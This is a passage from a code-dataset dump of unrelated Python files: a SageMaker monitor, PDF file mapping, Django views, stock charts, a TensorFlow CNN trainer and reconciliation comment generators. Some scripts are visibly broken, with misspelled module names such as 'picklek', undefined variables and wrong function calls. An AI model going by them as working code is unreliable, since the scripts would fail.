units):\n global standard\n global KNOWN_CONCENTRATION\n global UNITS\n\n standard = image\n KNOWN_CONCENTRATION = concentration\n UNITS = units\n\n\ndef add_image(image):\n global mid_images\n mid_images.append(image)\n\n\ndef get_pix_map(image):\n pix = image.load()\n q_image = QImage(image.size[0], image.size[1], QImage.Format_RGB32)\n for i in range(image.size[0]):\n for j in range(image.size[1]):\n value = qRgb(pix[i, j][0], pix[i, j][1], pix[i, j][1])\n q_image.setPixel(i, j, value)\n return q_image\n\n\ndef get_state():\n if not mid_images:\n return \"No images other than your blank and standard have been added.\"\n else:\n ret_str = \"\"\n for i in range(len(mid_images)):\n sub_str = 'Image ' + str(i + 1) + ':\\t'\n sub_str += 'Concentration:\\t' + str(mid_images[i].volume) + '\\t'\n sub_str += 'File Name:\\t' + mid_images[i].file_name\n ret_str += sub_str\n if i + 1 < len(mid_images):\n ret_str += '\\n'\n return ret_str\n\n\n# GENERATE CROPPED:\n# cropped = im.crop((self.min_x, self.min_y, self.max_x, self.max_y))\n# GENERATE SCALED:\n# scaling_factor = max(im.size[0], im.size[1])\n# scaled_orig_x = ORIG_SCALED_SIZE[0] * im.size[0] // scaling_factor\n# scaled_orig_y = ORIG_SCALED_SIZE[1] * im.size[1] // scaling_factor\n# scaled_orig = im.resize((scaled_orig_x, scaled_orig_y))\n# GENERATE SCALED CROPPED:\n# Like, both at once dummy\n","sub_path":"ImageManager.py","file_name":"ImageManager.py","file_ext":"py","file_size_in_byte":5678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"139006798","text":"from collections import namedtuple\nfrom datetime import timedelta\nfrom future.utils import with_metaclass\nimport abc\nimport boto3\nimport logging\nimport pprint\nimport time\n\nfrom parallelm.common.cached_property import cached_property\nfrom parallelm.common.mlcomp_exception import MLCompException\nfrom parallelm.common.os_util import utcnow\nfrom parallelm.extra.sagemaker.monitor.report import Report\nfrom parallelm.extra.sagemaker.monitor.sm_api_constants import SMApiConstants\n\n\nclass JobMonitorBase(with_metaclass(abc.ABCMeta, object)):\n MONITOR_INTERVAL_SEC = 10.0\n ONLINE_METRICS_FETCHING_NUM_RETRIES = 1\n FINAL_METRICS_FETCHING_NUM_RETRIES = 36\n SLEEP_TIME_BETWEEN_METRICS_FETCHING_RETRIES_SEC = 5.0\n\n MetricMeta = namedtuple('MetricMeta', ['id', 'metric_name', 'stat'])\n\n def __init__(self, sagemaker_client, job_name, logger):\n self._logger = logger\n self._sagemaker_client = sagemaker_client\n self._job_name = job_name\n self._on_complete_callback = None\n self._host_metrics_fetched_successfully = False\n self._cloudwatch_client = boto3.client('cloudwatch')\n\n def monitor(self):\n self._logger.info(\"Monitoring job ... {}\".format(self._job_name))\n while True:\n response = self._describe_job()\n if self._logger.isEnabledFor(logging.DEBUG):\n self._logger.debug(pprint.pformat(response, indent=4))\n\n status = self._job_status(response)\n running_time_sec = self._total_running_time_sec(response)\n billing_time_sec = self._billing_time_sec(response)\n Report.job_status(self._job_name, running_time_sec, billing_time_sec, status)\n\n self._report_online_metrics(response)\n\n if status == SMApiConstants.JOB_COMPLETED:\n self._report_final_metrics(response)\n self._logger.info(\"Job '{}' completed!\".format(self._job_name))\n if self._on_complete_callback:\n self._on_complete_callback(response)\n break\n elif status == SMApiConstants.JOB_FAILED:\n msg = \"Job '{}' failed! message: {}\" \\\n .format(self._job_name, response[SMApiConstants.FAILURE_REASON])\n self._logger.error(msg)\n raise MLCompException(msg)\n elif status != SMApiConstants.JOB_IN_PROGRESS:\n self._logger.warning(\"Unexpected job status! job-name: {}, status: {}\"\n .format(self._job_name, status))\n\n self._logger.info(\"Job '{}' is still running ... {} sec\"\n .format(self._job_name, running_time_sec))\n time.sleep(JobMonitorBase.MONITOR_INTERVAL_SEC)\n\n def set_on_complete_callback(self, on_complete_callback):\n # The prototype of the callback is 'callback(describe_response)'\n self._on_complete_callback = on_complete_callback\n return self\n\n def _total_running_time_sec(self, describe_response):\n create_time = self._job_create_time(describe_response)\n if create_time is None:\n return None\n\n return (self._last_running_ref_time(describe_response) - create_time).total_seconds()\n\n def _billing_time_sec(self, response):\n start_time = self._job_start_time(response)\n return (self._last_running_ref_time(response) - start_time).total_seconds() if start_time else None\n\n def _last_running_ref_time(self, describe_response):\n end_time = self._job_end_time(describe_response)\n return end_time if end_time else utcnow()\n\n def _job_create_time(self, describe_response):\n create_time = describe_response.get(SMApiConstants.CREATE_TIME)\n if create_time:\n if (utcnow() - create_time).total_seconds() > JobMonitorBase.MONITOR_INTERVAL_SEC * 2:\n self._logger.warning(\"The local machine clock and AWS CloudWatch clock are not synchronized!!!\")\n\n return create_time\n\n def _job_is_running(self, describe_response):\n return self._job_start_time(describe_response) is not None and \\\n self._job_end_time(describe_response) is None\n\n def _report_online_metrics(self, describe_response):\n self._report_job_host_metrics(describe_response, JobMonitorBase.ONLINE_METRICS_FETCHING_NUM_RETRIES)\n self._report_extended_online_metrics(describe_response)\n\n def _report_final_metrics(self, describe_response):\n if self._host_metrics_fetched_successfully:\n self._logger.info(\"Skip final job host metrics fetching\")\n else:\n self._logger.info(\"Trying to fetch final host metrics ... (#attempts: {})\"\n .format(JobMonitorBase.FINAL_METRICS_FETCHING_NUM_RETRIES))\n self._report_job_host_metrics(describe_response, JobMonitorBase.FINAL_METRICS_FETCHING_NUM_RETRIES)\n\n self._report_extended_final_metrics(describe_response)\n\n def _report_job_host_metrics(self, describe_response, num_retries):\n # No reason to start reading metrics before the job is actually starting\n if self._job_start_time(describe_response):\n job_instance_ids = self._get_job_instance_ids(num_retries)\n if job_instance_ids:\n self._logger.info(\"Job instance ids: {}\".format(job_instance_ids))\n metrics_data = self._fetch_job_host_metrics(job_instance_ids, describe_response)\n Report.job_host_metrics(self._job_name, metrics_data)\n self._host_metrics_fetched_successfully = True\n else:\n self._logger.info(\"Skip transform job host metrics reporting!\")\n\n def _get_job_instance_ids(self, num_retries):\n instance_ids = []\n for retry_index in range(num_retries):\n paginator = self._cloudwatch_client.get_paginator('list_metrics')\n response_iterator = paginator.paginate(Dimensions=[{'Name': SMApiConstants.HOST_KEY}],\n MetricName=SMApiConstants.METRIC_CPU_UTILIZATION,\n Namespace=self._metrics_namespace())\n for response in response_iterator:\n # if self._logger.isEnabledFor(logging.DEBUG):\n # self._logger.debug(pprint.pformat(response, indent=4))\n for metric in response[SMApiConstants.LIST_METRICS_NAME]:\n instance_id = metric[SMApiConstants.LIST_METRICS_DIM][0][SMApiConstants.LIST_METRICS_DIM_VALUE]\n if instance_id.startswith(self._job_name):\n instance_ids.append(instance_id)\n\n if instance_ids or retry_index == num_retries - 1:\n break\n\n time.sleep(JobMonitorBase.SLEEP_TIME_BETWEEN_METRICS_FETCHING_RETRIES_SEC)\n self._logger.debug(\"Another attempt to find job instance id! job name: {}, #attempt: {}\"\n .format(self._job_name, retry_index))\n\n if not instance_ids:\n self._logger.info(\"Couldn't find job instance id! job name: {}\".format(self._job_name))\n\n return instance_ids\n\n def _fetch_job_host_metrics(self, job_instance_ids, describe_response):\n start_time = self._job_start_time(describe_response)\n # Incrementing end time by 1 min since CloudWatch drops seconds before finding the logs.\n # This results in logs being searched in the time range in which the correct log line was not present.\n # Example - Log time - 2018-10-22 08:25:55\n # Here calculated end time would also be 2018-10-22 08:25:55 (without 1 min addition)\n # CW will consider end time as 2018-10-22 08:25 and will not be able to search the correct log.\n end_time = self._last_running_ref_time(describe_response) + timedelta(minutes=1)\n\n d, r = divmod((end_time - start_time).total_seconds(), 60)\n period = int(d) * 60 + 60 # must be a multiplier of 60\n self._logger.debug(\"Start time: {}, end time: {}, period: {} sec\".format(start_time, end_time, period))\n\n metric_data_queries = self._metric_data_queries(job_instance_ids, period)\n\n if self._logger.isEnabledFor(logging.DEBUG):\n self._logger.debug(pprint.pformat(metric_data_queries, indent=4))\n\n response = self._cloudwatch_client.get_metric_data(\n MetricDataQueries=metric_data_queries,\n StartTime=start_time,\n EndTime=end_time,\n ScanBy=SMApiConstants.TIMESTAMP_ASC\n )\n\n if self._logger.isEnabledFor(logging.DEBUG):\n self._logger.debug(pprint.pformat(response, indent=4))\n\n return response[SMApiConstants.METRICS_RESULTS]\n\n def _metric_data_queries(self, job_instance_ids, period):\n metric_data_queries = []\n for job_instance_id in job_instance_ids:\n inst_id = job_instance_id.split('-')[-1]\n for metric_meta in self._host_metrics_defs:\n query = {\n 'Id': metric_meta.id.format(inst_id),\n 'MetricStat': {\n 'Metric': {\n 'Namespace': self._metrics_namespace(),\n 'MetricName': metric_meta.metric_name,\n 'Dimensions': [\n {\n 'Name': SMApiConstants.HOST_KEY,\n 'Value': job_instance_id\n }\n ]\n },\n 'Period': period,\n 'Stat': metric_meta.stat\n }\n }\n metric_data_queries.append(query)\n\n return metric_data_queries\n\n @abc.abstractmethod\n def _describe_job(self):\n pass\n\n @abc.abstractmethod\n def _job_start_time(self, describe_response):\n pass\n\n @abc.abstractmethod\n def _job_end_time(self, describe_response):\n pass\n\n @abc.abstractmethod\n def _job_status(self, describe_response):\n pass\n\n @abc.abstractmethod\n def _report_extended_online_metrics(self, describe_response):\n pass\n\n @abc.abstractmethod\n def _report_extended_final_metrics(self, describe_response):\n pass\n\n @cached_property\n @abc.abstractmethod\n def _host_metrics_defs(self):\n pass\n\n @abc.abstractmethod\n def _metrics_namespace(self):\n pass\n","sub_path":"mlcomp/parallelm/extra/sagemaker/monitor/job_monitor_base.py","file_name":"job_monitor_base.py","file_ext":"py","file_size_in_byte":10499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"514857660","text":"import shutil\nimport numpy as np\nimport os\nimport os.path\nimport os.path\n\n\nbase_path=r\"D:\\\\pdfs\\\\\"\nsub_poath=\"new\"\npath=base_path+sub_poath\nprint(path)\n\n\npath_main=r\"D:\\\\sheet_upload\\\\\"\nprint(path_main)\n#print(os.listdir())\narr_pdf = [x for x in os.listdir(path) if x.endswith(\".pdf\")]\nprint(arr_pdf)\nprint(len(arr_pdf))\n\narr_pdf_main = [x for x in os.listdir(path_main) if x.endswith(\".pdf\")]\nprint(arr_pdf_main)\nprint(len(arr_pdf_main))\nlst_name_changed=[]\nmy_dict={}\nmy_dict2={}\n\nos.chdir(path_main)\nprint(os.getcwd())\nlst_diff=[]\nfor change in arr_pdf_main:\n #print(change)\n #print(change)\n tmp_name = change.replace(\"_datasheet_en.pdf\",\"\").replace(\"-\", \"\").replace(\":\", \"\").replace(\"_\", \"\")\n print(tmp_name)\n file_stats = os.stat(path_main+change)\n #print(file_stats)\n size = os.path.getsize(change)\n #lst_name_changed.append(change)\n #print(size)\n my_dict[tmp_name]= [size, change, path_main + \"\\\\\\\\\" + change]\n '''\n if change not in my_dict.keys():\n my_dict[change] = [size, tmp_name, path_main + \"\\\\\\\\\" + change]\n else:\n # print('uuuuuuuuuuuuuuuuuuuuu',my_dict[change][0])\n if (int(my_dict[change][0]) <= size):\n lst_diff.append(tmp_name)\n my_dict[change] = [size, tmp_name, path + \"\\\\\\\\\" + change]\n else:\n continue\n '''\nos.chdir(path)\nprint(os.getcwd())\nfor tt in arr_pdf:\n #print(tt)\n tmp_name2 = tt.replace(\"-\", \"\").replace(\":\", \"\").replace(\"_\", \"\").replace(\".pdf\",\"\")\n print(tmp_name2)\n #tmp_name=tmp_name+\".pdf\"\n #print()\n #file_stats = os.stat(path + tt)\n # print(file_stats)\n size2 = os.path.getsize(tt)\n my_dict2[tmp_name2] = [size2, tt, path + \"\\\\\\\\\" + tt]\nmy_dict3={}\nlst_ll=[]\nmap_file=open('D:\\\\sheet_final2\\\\map_files.csv', 'w', encoding='utf-8')\nmap_all_pid=open('D:\\\\sheet_final2\\\\map_all_pids.csv', 'w', encoding='utf-8')\nmap_all_pid.write(\"pid|new|old\"+\"\\n\")\nfor k , v in my_dict.items():\n if k in my_dict2.keys():\n inp_all = str(k) + \"|\" + my_dict2[k][1] + \"|\" + v[1] + \"\\n\"\n map_all_pid.write(inp_all)\n print(\"_____________________\",k)\n print(v)\n print(my_dict2[k])\n print(v[0])\n print(my_dict2[k][0])\n if(v[0]Welcome to Akirachix class students

    \")\ndef student(self,request):\n # students=Student.objects.all()\n students=Student.objects.get(id=1)\n \n context={\n 'test.message':'we will list our students here',\n 'student.name':'Susan Awiti',\n 'course':'python',\n 'description':'susan is bad student'\n # Student.objects.exclude(course='python')\n # return HttpResponse(students.description)\n # return HttpResponse(students)\n }\n return render(request,'listing_student.html',context)","sub_path":"firstapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"66123418","text":"# -*- coding: utf-8 -*-\nimport mplfinance as fplt\nimport yfinance as yf\n\ndef get_data(stock_id, period):\n stock_id = str(stock_id) + \".TW\" # Yahoo Finance 的 代號為台灣的代號 + .TW\n data = yf.Ticker(stock_id) # 抓取資料\n \n # 1mo = 1個月,max 可以把所有期間的資料都下載\n ohlc = data.history(period= period)\n ohlc = ohlc.loc[:, [\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]] # 選擇製圖需要欄位\n return ohlc\n \ndef draw_candle_chart(stock_id, ohlc):\n \n mc = fplt.make_marketcolors(\n up='tab:red',down='tab:green',\n wick={'up':'red','down':'green'},\n volume='tab:green',\n )\n \n s = fplt.make_mpf_style(marketcolors=mc)\n \n fplt.plot(\n ohlc,\n type = 'candle',\n style = s,\n title = stock_id,\n ylabel = 'Price ($)', \n volume = True,\n savefig='stock_Kbar.png',\n \n )\n\n #plt.savefig(\"\")\n \nif __name__ == \"__main__\":\n draw_candle_chart(2330)\n \n","sub_path":"程式交易實作/禮拜一的課/4. 合併/yF_Kbar.py","file_name":"yF_Kbar.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"483317950","text":"import numpy as np\nimport tensorflow as tf\nimport sys,os\nimport cPickle as pickle\nfrom net3 import graph, model, get_args, model_path\n\nwith open('/home/ouyangruo/Documents/BiShe/Picture/data0.pickle', 'rb') as m0, open('/home/ouyangruo/Documents/BiShe/Picture/data1.pickle', 'rb') as m1,\\\n open('/home/ouyangruo/Documents/BiShe/Picture/data2.pickle', 'rb') as m2, open('/home/ouyangruo/Documents/BiShe/Picture/data3.pickle', 'rb') as m3, \\\n open('/home/ouyangruo/Documents/BiShe/Picture/data4.pickle', 'rb') as m4, open('/home/ouyangruo/Documents/BiShe/Picture/data5.pickle', 'rb') as m5, \\\n open('/home/ouyangruo/Documents/BiShe/Picture/data6.pickle', 'rb') as m6, open('/home/ouyangruo/Documents/BiShe/Picture/data7.pickle', 'rb') as m7, \\\n open('/home/ouyangruo/Documents/BiShe/Picture/data8.pickle', 'rb') as m8, open('/home/ouyangruo/Documents/BiShe/Picture/data9.pickle', 'rb') as m9, \\\n open('/home/ouyangruo/Documents/BiShe/Picture_one/data0.pickle', 'rb') as f0, open('/home/ouyangruo/Documents/BiShe/Picture_one/data1.pickle', 'rb') as f1,\\\n open('/home/ouyangruo/Documents/BiShe/Picture_one/data2.pickle', 'rb') as f2, open('/home/ouyangruo/Documents/BiShe/Picture_one/data3.pickle', 'rb') as f3, \\\n open('/home/ouyangruo/Documents/BiShe/Picture_one/data4.pickle', 'rb') as f4, open('/home/ouyangruo/Documents/BiShe/Picture_one/data5.pickle', 'rb') as f5, \\\n open('/home/ouyangruo/Documents/BiShe/Picture_one/data6.pickle', 'rb') as f6, open('/home/ouyangruo/Documents/BiShe/Picture_one/data7.pickle', 'rb') as f7, \\\n open('/home/ouyangruo/Documents/BiShe/Picture_one/data8.pickle', 'rb') as f8, open('/home/ouyangruo/Documents/BiShe/Picture_one/data9.pickle', 'rb') as f9: \n \n train_datasets = np.concatenate((\n picklek.load(m0), picklek.load(m1), picklek.load(m2), picklek.load(m3), picklek.load(m4),\n picklek.load(m5), picklek.load(m6), picklek.load(m7), picklek.load(m8), pickle.load(m9)\n ))\n test_datasets = np.concatenate((\n picklek.load(f0), picklek.load(f1), picklek.load(f2), picklek.load(f3), picklek.load(f4),\n picklek.load(f5), picklek.load(f6), picklek.load(f7), picklek.load(f8), pickle.load(f9)\n ))\n print('Training set', train_datasets.shape)\n print('Test set', test_datasets.shape)\n\n\ntrain_size, test_size = 7000, 3000\nimage_size = 25\nnum_labels = 10\nnum_channels = 1 \n\ndef make_arrays(nb_rows, img_size):\n if nb_rows:\n labels = np.ndarray(nb_rows, dtype=np.int32)\n else:\n labels = None, None\n return labels\n\n\ndef merge_datasets(pickle_files, train_size):\n num_classes = len(pickle_files)\n train_labels = make_arrays(train_size, image_size)\n tsize_per_class = train_size // num_classes\n\n start_v, start_t = 0, 0\n end_t= tsize_per_class\n for label, pickle_file in enumerate(pickle_files):\n train_labels[start_t:end_t] = label\n start_t += tsize_per_class\n end_t += tsize_per_class\n\n return train_labels\n\n\ndef randomize(dataset, labels):\n permutation = np.random.permutation(labels.shape[0])\n shuffled_dataset = dataset[permutation, :, :]\n shuffled_labels = labels[permutation]\n return shuffled_dataset, shuffled_labels\n\n\n\ntrain_labels = merge_datasets(train_datasets, train_size)\ntest_labels = merge_datasets(test_datasets, test_size)\n\nprint('Training:', train_datasets.shape, train_labels.shape)\nprint('Testing:', test_datasets.shape, test_labels.shape)\n\ntrain_labels = randomize(train_datasets, train_labels)\ntest_labels = randomize(test_datasets, test_labels)\n\n\ndef reformat(dataset, labels):\n dataset = dataset.reshape((-1, image_size, image_size, num_channels)).astype(np.float32)\n labels = (np.arange(num_labels) == labels[:,None]).astype(np.float32)\n return dataset, labels\ntrain_dataset, train_labels = reformat(train_dataset, train_labels)\nvalid_dataset, valid_labels = reformat(valid_dataset, valid_labels)\ntest_dataset, test_labels = reformat(test_dataset, test_labels)\nprint('Training set', train_dataset.shape, train_labels.shape)\nprint('Validation set', valid_dataset.shape, valid_labels.shape)\nprint('Test set', test_dataset.shape, test_labels.shape)\n\n\ndef accuracy(predictions, labels):\n #print (\"result1:\")\n #print np.argmax(predictions,1)\n return (100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1)) / predictions.shape[0])\n\nbatch_size = 128\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n\n # Input data.\n tf_train_dataset = tf.placeholder(tf.float32, shape=(batch_size, image_size, image_size, num_channels))\n tf_train_labels = tf.placeholder(tf.float32, shape=(batch_size, num_labels))\n tf_valid_dataset = tf.constant(valid_dataset)\n tf_test_dataset = tf.constant(test_dataset)\n\n # Variables.\n layer0_weights = tf.Variable(tf.truncated_normal([5, 5, 1, 32], stddev=0.1))\n layer0_biases = tf.Variable(tf.zeros([32]))\n\n layer1_weights = tf.Variable(tf.truncated_normal([3, 3, 32, 64], stddev=0.1))\n layer1_biases = tf.Variable(tf.zeros([64]))\n\n layer2_weights = tf.Variable(tf.truncated_normal([3, 3, 64, 64], stddev=0.1))\n layer2_biases = tf.Variable(tf.constant(1.0, shape=[64]))\n\n layer3_weights = tf.Variable(tf.truncated_normal([3, 3, 64, 32], stddev=0.1))\n layer3_biases = tf.Variable(tf.constant(1.0, shape=[32]))\n\n layer4_weights = tf.Variable(tf.truncated_normal([4 * 4 * 32, 64], stddev=0.1))\n layer4_biases = tf.Variable(tf.constant(1.0, shape=[64]))\n\n layer5_weights = tf.Variable(tf.truncated_normal([64, 64], stddev=0.1))\n layer5_biases = tf.Variable(tf.constant(1.0, shape=[64]))\n\n layer6_weights = tf.Variable(tf.truncated_normal([64, 10], stddev=0.1))\n layer6_biases = tf.Variable(tf.constant(1.0, shape=[10]))\n\n\n #Model.\n #Now instead of using strides = 2 for convolutions we will use maxpooling with\n #same convolution sizes\n def model(data):\n conv = tf.nn.conv2d(data, layer0_weights, [1, 1, 1, 1], padding='SAME')\n maxpool = tf.nn.max_pool(conv, [1, 3, 3, 1], [1, 2, 2, 1], padding='SAME')\n hidden = tf.nn.relu(maxpool + layer0_biases)\n\n conv = tf.nn.conv2d(hidden, layer1_weights, [1, 1, 1, 1], padding='SAME')\n maxpool = tf.nn.max_pool(conv, [1, 3, 3, 1], [1, 2, 2, 1], padding='SAME')\n hidden = tf.nn.relu(maxpool + layer1_biases)\n\n conv = tf.nn.conv2d(hidden, layer2_weights, [1, 1, 1, 1], padding='SAME')\n hidden = tf.nn.relu(conv + layer2_biases)\n\n conv = tf.nn.conv2d(hidden, layer3_weights, [1, 1, 1, 1], padding='SAME')\n maxpool = tf.nn.max_pool(conv, [1, 3, 3, 1], [1, 2, 2, 1], padding='SAME')\n hidden = tf.nn.relu(maxpool + layer3_biases)\n\n shape = hidden.get_shape().as_list()\n reshape = tf.reshape(hidden, [shape[0], shape[1] * shape[2] * shape[3]])\n\n hidden = tf.nn.relu(tf.matmul(reshape, layer4_weights) + layer4_biases)\n\n hidden = tf.nn.relu(tf.matmul(hidden, layer5_weights) + layer5_biases)\n\n return tf.matmul(hidden, layer6_weights) + layer6_biases\n\n # Training computation.\n logits = model(tf_train_dataset)\n global_step = tf.Variable(0)\n start_learning_rate = 0.005\n decay_steps = 1000\n decay_size = 0.95\n learning_rate = tf.train.exponential_decay(start_learning_rate, global_step, decay_steps, decay_size)\n\n saver = tf.train.Saver()\n\n beta = 0.0005\n l2_loss = (beta*tf.nn.l2_loss(layer0_weights)\n + beta*tf.nn.l2_loss(layer0_biases)\n + beta*tf.nn.l2_loss(layer1_weights)\n + beta*tf.nn.l2_loss(layer1_biases)\n + beta*tf.nn.l2_loss(layer2_weights)\n + beta*tf.nn.l2_loss(layer2_biases)\n + beta*tf.nn.l2_loss(layer3_weights)\n + beta*tf.nn.l2_loss(layer3_biases)\n + beta*tf.nn.l2_loss(layer4_weights)\n + beta*tf.nn.l2_loss(layer4_biases)\n + beta*tf.nn.l2_loss(layer5_weights)\n + beta*tf.nn.l2_loss(layer5_biases)\n + beta*tf.nn.l2_loss(layer6_weights)\n + beta*tf.nn.l2_loss(layer6_biases))\n\n loss = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=tf_train_labels) + l2_loss\n )\n # Optimizer.\n optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss, global_step=global_step)\n # Predictions for the training, validation, and test data.\n train_prediction = tf.nn.softmax(logits)\n valid_prediction = tf.nn.softmax(model(tf_valid_dataset))\n test_prediction = tf.nn.softmax(model(tf_test_dataset))\n\n\nnum_steps = 10001\n\nwith tf.Session(graph=graph) as session:\n ckpt = tf.train.get_checkpoint_state('model')\n print(ckpt)\n try:\n assert (ckpt and ckpt.model_checkpoint_path)\n saver.restore(session, ckpt.model_checkpoint_path)\n except:\n tf.global_variables_initializer().run()\n print(\"--------- load error!!! --------\")\n\n \n for step in xrange(num_steps):\n offset = (step * batch_size) % (train_labels.shape[0] - batch_size)\n batch_data = train_dataset[offset:(offset + batch_size), :, :, :]\n batch_labels = train_labels[offset:(offset + batch_size), :]\n feed_dict = {tf_train_dataset : batch_data, tf_train_labels : batch_labels}\n session.run([optimizer], feed_dict=feed_dict)\n if (step % 100 == 0):\n l, predictions, l2 = session.run([loss, train_prediction, l2_loss], feed_dict=feed_dict)\n saver.save(session, '/ouyangruo/Documents/BiShe/model/model.ckpt')\n print(learning_rate.eval())\n print('Minibatch loss and l2 loss at step %d: %f, %f' % (step, l, l2))\n print('Minibatch accuracy: %.1f%%' % accuracy(predictions, batch_labels))\n print('Validation accuracy: %.1f%%' % accuracy(valid_prediction.eval(), valid_labels))\n print('Test accuracy: %.1f%%' % accuracy(test_prediction.eval(), test_labels))\n \n ","sub_path":"Code/train_cnn.py","file_name":"train_cnn.py","file_ext":"py","file_size_in_byte":9651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"122508477","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\n\n\n# In[14]:\n\n\ndef brokermap(x):\n if x == 'barclays':\n return 'BARC'\n elif x == 'morgan stanely':\n return 'MS'\n elif x == 'jp morgan':\n return 'jpm'\n elif x == 'goldman sachs':\n return 'gs'\n elif x == 'us bank':\n return 'usbk'\n elif x == 'citi bank':\n return 'citi'\n elif x == 'northern trust':\n return 'NT'\n elif x == 'deutsche bank':\n return 'db'\n elif x=='state street':\n return 'sst'\n elif x == 'bn paribas':\n return 'bnp'\n elif x == 'credit suisse':\n return 'cs'\n else:\n return x\n \n\n\n# In[ ]:\n\n\ndef comgen(x,y,z,k,m,a,b,c):\n trade_ttype = ['buy','sell','sell short','cover short','spot fx','forward','forward fx','spotfx','forwardfx']\n pos_break = ['settlement amount , no pos break']\n x = x.lower()\n if m in trade_ttype:\n if x != 'geneva':\n if ((a!= 0) & (b!= 0)):\n com = k + ' ' +y + ' ' + str(z) + \" \" + 'for price'+' '+ str(a) + ' and quantity' +' ' + str(b) + ' ' + 'on trade date' + ' ' + str(c)+ '. Geneva yet to book' \n elif ((a==0) & (b!=0)):\n com = k + ' ' +y + ' ' + str(z) + \" \" + 'for quantity' +' ' + str(b) + ' ' + 'on trade date' + ' ' + str(c) + '. Geneva yet to book'\n elif ((a!=0) & (b==0)):\n com = k + ' ' +y + ' ' + str(z) + \" \" + 'for price' +' ' + str(a) + ' ' + 'on trade date' + ' ' + str(c) + '. Geneva yet to book'\n else:\n com = k + ' ' +y + ' ' + str(z) + ' ' + 'on trade date' + ' ' + str(c) + '. Geneva yet to book'\n else:\n if ((a!= 0) & (b!= 0)):\n com = 'Geneva' + ' ' +y + ' ' + str(z) + \" \" + 'for price'+' '+ str(a) + ' and quantity' +' ' + str(b) + ' ' + 'on trade date' + ' ' + str(c)+ '.'+ 'k'+ ' yet to book' \n elif ((a==0) & (b!=0)):\n com = 'Geneva' + ' ' +y + ' ' + str(z) + \" \" + 'for quantity' +' ' + str(b) + ' ' + 'on trade date' + ' ' + str(c) + '.'+ 'k'+ ' yet to book'\n elif ((a!=0) & (b==0)):\n com = 'Geneva' + ' ' +y + ' ' + str(z) + \" \" + 'for price' +' ' + str(a) + ' ' + 'on trade date' + ' ' + str(c) + '.'+ 'k'+ ' yet to book'\n else:\n com = 'Geneva' + ' ' +y + ' ' + str(z) + ' ' + 'on trade date' + ' ' + str(c) + '.'+ 'k'+ ' yet to book'\n \n elif m in pos_break:\n \n if ((a!= 0) & (b!= 0)):\n com ='No position break, Geneva to reflect jpm trade on ' + str(z) + \" \" + 'for price'+' '+ str(a) + ' and quantity' +' ' + str(b)\n elif ((a==0) & (b!=0)):\n com = 'No position break, Geneva to reflect jpm trade on ' + str(z) + \" \" + 'for quantity' +' ' + str(b) \n elif ((a!=0) & (b==0)):\n com = 'No position break, Geneva to reflect jpm trade on ' + str(z) + \" \" + 'for price' +' ' + str(a) \n else:\n com = 'No position break, Geneva to reflect jpm trade on ' + str(z)\n \n else:\n if x != 'geneva':\n \n com = k + ' ' +y + ' ' + str(z) + \". Geneva yet to book\"\n else:\n com = 'Geneva' + ' ' +y + ' ' + str(z)+ '.' + k + 'booked the transaction'\n \n return com\n\n\nresult_non_trade['new_pb2'] = result_non_trade['new_pb2'].astype(str)\nresult_non_trade['predicted template'] = result_non_trade['predicted template'].astype(str)\nresult_non_trade['ViewData.Settle Date2'] = result_non_trade['ViewData.Settle Date'].dt.date\nresult_non_trade['ViewData.Settle Date2'] = result_non_trade['ViewData.Settle Date2'].astype(str)\nresult_non_trade['ViewData.Trade Date2'] = result_non_trade['ViewData.Trade Date'].dt.date\nresult_non_trade['ViewData.Trade Date2'] = result_non_trade['ViewData.Trade Date2'].astype(str)\nresult_non_trade['new_pb1'] = result_non_trade['new_pb1'].astype(str)\nresult_non_trade['new_pb1'] = result_non_trade['new_pb1'].apply(lambda x : brokermap(x))\n\n#result_non_trade['predicted comment'] = result_non_trade.apply(lambda x : comgen(x['new_pb2'],x['predicted template'],x['ViewData.Settle Date'],x['new_pb1']), axis = 1)\n#Change made on 24-12-2020 as per Abhijeet. The comgen function below was commented out and a new, more elaborate comgen function was coded in. Also, corresponding to the comgen function, predicted_comment apply function was also changed.\n#result_non_trade['predicted comment'] = result_non_trade.apply(lambda x : comgen(x['ViewData.Side0_UniqueIds'],x['predicted template'],x['ViewData.Settle Date'],x['new_pb1']), axis = 1)\nresult_non_trade['predicted comment'] = result_non_trade.apply(lambda x : comgen(x['new_pb2'],x['predicted template'],x['ViewData.Settle Date2'],x['new_pb1'],x['predicted category'],x['ViewData.Price'],x['ViewData.Quantity'],x['ViewData.Trade Date']), axis = 1)\n\nresult_non_trade = result_non_trade[['ViewData.Side0_UniqueIds','ViewData.Side1_UniqueIds','predicted category','predicted comment']]\n\n\n# In[2]:\n\n\ntemplate = pd.read_csv('weiss files for testing gompu/Weiss Comment template for delivery new.csv')\n\n\n# In[12]:\n\n\ntemplate.head(4)\n\n\n# In[7]:\n\n\ndef commentgen(x):\n com = 'booked the' + ' ' +str(x) +' '+'transaction on SD'\n return com\n\n\n# In[8]:\n\n\ntemplate['Template'] = template['Category'].apply(lambda x :commentgen(x))\n\n\n# In[10]:\n\n\ntemplate.drop('template', axis = 1, inplace = True)\n\n\n# In[11]:\n\n\ntemplate = template.rename(columns = {'Template':'template'})\n\n\n# In[13]:\n\n\ntemplate.to_csv('weiss files for testing gompu/Weiss Comment template for delivery new.csv')\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Abhijeet - Comment/Comgen final correction.py","file_name":"Comgen final correction.py","file_ext":"py","file_size_in_byte":5576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"446651562","text":"import hashlib\nimport logging\n\nfrom webapp2 import Response\nfrom webapp2 import cached_property\n\nfrom google.appengine.api import users\nfrom google.appengine.api import memcache\n\nfrom 